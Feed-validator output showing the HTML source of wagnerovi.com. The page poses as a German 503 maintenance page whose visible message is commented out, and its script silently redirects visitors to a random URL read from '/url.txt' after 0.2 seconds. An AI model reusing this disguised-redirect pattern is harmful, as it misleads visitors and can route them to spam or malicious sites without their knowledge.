It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: https://wagnerovi.com/

  1. <!DOCTYPE html>
  2. <html lang="de">
  3. <head>
  4.    <meta charset="UTF-8">
  5.    <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7.    <title>503 Dienst nicht verfügbar</title>
  8.    <style>
  9.        body {
  10.            font-family: Arial, sans-serif;
  11.            background-color: #f2f2f2;
  12.            color: #333;
  13.            text-align: center;
  14.            padding: 50px;
  15.        }
  16.        .container {
  17.            max-width: 600px;
  18.            margin: auto;
  19.            background-color: #fff;
  20.            padding: 30px;
  21.            border-radius: 8px;
  22.            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  23.        }
  24.        h1 {
  25.            font-size: 48px;
  26.            margin-bottom: 20px;
  27.            color: #e74c3c;
  28.        }
  29.        p {
  30.            font-size: 18px;
  31.            margin-bottom: 30px;
  32.        }
  33.        .refresh-button {
  34.            background-color: #3498db;
  35.            color: white;
  36.            padding: 10px 20px;
  37.            text-decoration: none;
  38.            border-radius: 5px;
  39.            font-size: 16px;
  40.        }
  41.        .refresh-button:hover {
  42.            background-color: #2980b9;
  43.        }
  44.    </style>
  45.    <script async src="https://www.googletagmanager.com/gtag/js?id=G-Q7FB9R0HEM"></script>
  46.    <script>
  47.      window.dataLayer = window.dataLayer || [];
  48.      function gtag(){dataLayer.push(arguments);}
  49.      gtag('js', new Date());
  50.    
  51.      gtag('config', 'G-Q7FB9R0HEM');
  52.    </script>
  53. </head>
  54. <body>
  55.    <!--<div class="container">-->
  56.    <!--    <h1>503</h1>-->
  57.    <!--    <p>Dienst nicht verfügbar</p>-->
  58.    <!--    <p>Der Server ist vorübergehend nicht in der Lage, Ihre Anfrage aufgrund von Wartungsarbeiten oder Kapazitätsproblemen zu bearbeiten. Bitte versuchen Sie es später erneut.</p>-->
  59.    <!--    <a href="javascript:location.reload()" class="refresh-button">Erneut versuchen</a>-->
  60.    <!--</div>-->
  61.    <script>
  62.        function readTextFile(file, callback) {
  63.            var rawFile = new XMLHttpRequest();
  64.            rawFile.overrideMimeType("application/json");
  65.            rawFile.open("GET", file, true);
  66.            rawFile.onreadystatechange = function() {
  67.                if (rawFile.readyState === 4 && rawFile.status == "200") {
  68.                    callback(rawFile.responseText);
  69.                }
  70.            }
  71.            rawFile.send(null);
  72.        }
  73.  
  74.        readTextFile("/url.txt", function(text){
  75.            var urls = text.split("\n");
  76.            var randomUrl = urls[Math.floor(Math.random() * urls.length)];
  77.            setTimeout(function() {
  78.                window.location.href = randomUrl;
  79.            }, 200); // 0.2秒延迟
  80.        });
  81.    </script>
  82. </body>
  83. </html>
  84.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda